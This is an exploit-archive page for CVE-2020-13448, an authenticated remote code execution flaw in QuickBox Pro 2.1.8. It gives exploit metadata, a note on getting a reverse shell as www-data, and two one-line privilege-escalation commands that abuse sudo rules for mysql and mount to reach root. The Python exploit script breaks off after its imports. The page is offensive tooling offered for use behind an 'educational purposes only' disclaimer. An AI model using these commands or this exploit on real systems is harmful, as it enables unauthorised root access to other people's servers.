Quickbox pro 2.1.8 authenticated remote code execution Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2020-06-01 |
Type : webapps |
Platform : php
This exploit / vulnerability Quickbox pro 2.1.8 authenticated remote code execution is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: QuickBox Pro 2.1.8 - Authenticated Remote Code Execution
# Date: 2020-05-26
# Exploit Author: s1gh
# Vendor Homepage: https://quickbox.io/
# Vulnerability Details: https://s1gh.sh/cve-2020-13448-quickbox-authenticated-rce/
# Version: <= 2.1.8
# Description: An authenticated low-privileged user can exploit a command injection vulnerability to get code-execution as www-data and escalate privileges to root due to weak sudo rules.
# Tested on: Debian 9
# CVE: CVE-2020-13448
# References: https://github.com/s1gh/QuickBox-Pro-2.1.8-Authenticated-RCE
'''
Privilege escalation: After getting a reverse shell as the www-data user you can escalate to root in one of two ways.
1. sudo mysql -e '\! /bin/sh'
2. sudo mount -o bind /bin/sh /bin/mount;sudo mount
'''
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import requests
import argparse
import sys
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from urllib.parse import quote_plus